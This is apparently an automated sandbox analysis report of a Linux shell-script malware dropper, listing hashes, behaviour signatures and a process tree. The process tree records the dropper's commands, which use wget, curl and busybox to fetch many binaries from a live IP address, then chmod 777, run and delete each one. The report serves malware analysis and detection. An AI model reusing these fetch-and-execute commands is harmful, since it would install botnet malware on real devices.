Analysis
-
max time kernel
37s -
max time network
39s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-11-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
-
Size
10KB
-
MD5
b511b6f4aeffa16d10d0f7ef26b0e23b
-
SHA1
83f64c0a7d2007fd0182aaae9636c5bbba453efe
-
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
-
SHA512
a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4
-
SSDEEP
96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 840 chmod 852 chmod 923 chmod 796 chmod 846 chmod 870 chmod 814 chmod 784 chmod 820 chmod 858 chmod 876 chmod 887 chmod 761 chmod 864 chmod 911 chmod 790 chmod 826 chmod 834 chmod 893 chmod 802 chmod 905 chmod 917 chmod 808 chmod 899 chmod 742 chmod 697 chmod 722 chmod 677 chmod -
Executes dropped EXE 28 IoCs
Processes:
YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakSYsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtioc pid Process /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 678 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 699 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 724 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 743 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 763 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 785 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 791 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 797 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 803 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 809 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 815 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 821 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 827 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 835 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 841 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 847 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 853 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 859 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 865 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 871 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 877 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 888 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 894 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 900 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 906 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 912 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 918 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 924 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlbusyboxwgetcurlbusyboxrmwgetKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5Frmpid Process 903 curl 904 busybox 811 wget 812 curl 813 busybox 816 rm 902 wget 815 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 906 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 907 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl
Processes
-
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:649
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:676
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:678
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:679
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:680
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:692
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:701
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:708
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:716
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:726
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:728
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:741
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:744
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:745
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:754
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:764
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:765
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:781
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:786
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:787
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:789
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:792
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:795
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:798
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:799
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:801
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:804
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:805
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:807
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:810
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:815
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:819
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:822
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:823
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:825
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:833
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:836
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:837
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:839
-
-
